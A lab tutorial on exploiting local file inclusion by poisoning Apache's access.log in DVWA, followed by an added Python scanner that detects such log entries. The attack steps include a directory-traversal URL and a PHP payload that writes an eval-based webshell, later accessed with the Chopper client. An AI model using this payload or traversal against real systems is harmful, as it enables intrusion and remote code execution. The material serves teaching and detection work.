Log File Vulnerability principle
When a PHP application has a local file inclusion vulnerability but files cannot be uploaded, it may seem that the inclusion flaw cannot be exploited at all; in that case an attacker can use the Apache log files to break in.
Once it is running, the Apache server generates two log files: access.log (the access log) and error.log (the error log). Apache records our requests in its log files, and each request is written to the access log file, access.log.
E.g.: http://192.168.1.55:8080/dvwa/vulnerabilities/fi/?page=../../../../Apache-20\logs\access.log
Lab environment:
- PHPstudy
- DVWA range
- Burp Suite capture software
- Chopper ("kitchen knife")
Environment configuration:
Open the Apache configuration file, search for CustomLog "logs/access.log" common, remove the comment marker in front of it, and then restart PHPstudy.
Simulation:
1, capture the request on the current web page
2, send it to the Repeater module
3, change the URL to <?php $file = fopen('c.php','w');fputs($file,'<?php @eval($_REQUEST[666]);?>')?> and then click GO
4, access the path C:\\phpStudy\\PHPTutorial\\Apache\\logs\\access.log; the figure shows that it executed successfully
5, in the fi directory, enter c.php?666=phpinfo(); it executes successfully
6, copy the URL and connect to it with Chopper
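
Detection:
The procedure above leaves two traces in access.log: a request line that carries a PHP open tag, and a later request whose parameter points at the log file itself. The following check is an added example, not part of the original page. It assumes the "common" log format configured above (so only the request line is logged, not User-Agent or Referer); the function name scan_access_log and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Apache "common" format, as enabled by: CustomLog "logs/access.log" common
# host ident user [time] "request line" status bytes
COMMON = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(.*)" (\d{3}) (\S+)$')
# PHP open tag in a request line: it would run if this log were ever included
PHP_TAG = re.compile(r'<\?(?:php|=)', re.I)
# A query parameter whose value points at an Apache log file
LOG_PARAM = re.compile(r'[?&][^=&\s]+=[^&\s]*(?:access|error)[._]log', re.I)

def scan_access_log(lines):
    """Return a list of (line_number, client, reason) for suspicious entries."""
    findings = []
    for number, line in enumerate(lines, 1):
        match = COMMON.match(line.rstrip("\r\n"))
        if not match:
            # Injected content can break the format; surface it for review
            findings.append((number, None, "unparseable"))
            continue
        client, request = match.group(1), match.group(3)
        # Decode twice so %3C%3Fphp and double-encoded variants are also seen
        decoded = unquote(unquote(request))
        if PHP_TAG.search(decoded):
            findings.append((number, client, "php-tag-in-request"))
        if LOG_PARAM.search(decoded):
            findings.append((number, client, "log-file-in-parameter"))
    return findings

# Constructed sample lines (not taken from a real server)
SAMPLE = [
    r'192.168.1.20 - - [10/Mar/2024:10:00:01 +0800] "GET /dvwa/vulnerabilities/fi/?page=include.php HTTP/1.1" 200 4021',
    r'192.168.1.20 - - [10/Mar/2024:10:00:09 +0800] "GET /dvwa/vulnerabilities/fi/?page=<?php echo 1; ?> HTTP/1.1" 400 226',
    r'192.168.1.20 - - [10/Mar/2024:10:00:15 +0800] "GET /dvwa/vulnerabilities/fi/?page=..%2F..%2F..%2F..%2FApache-20%5Clogs%5Caccess.log HTTP/1.1" 200 9120',
    r'192.168.1.21 - - [10/Mar/2024:10:01:00 +0800] "GET /dvwa/vulnerabilities/fi/?page=%3C%3Fphp%20echo%201%3B%3F%3E HTTP/1.1" 200 3990',
]

if __name__ == "__main__":
    for finding in scan_access_log(SAMPLE):
        print(finding)
```

A "php-tag-in-request" finding followed by a "log-file-in-parameter" finding from the same client is the sequence described in steps 3 and 4.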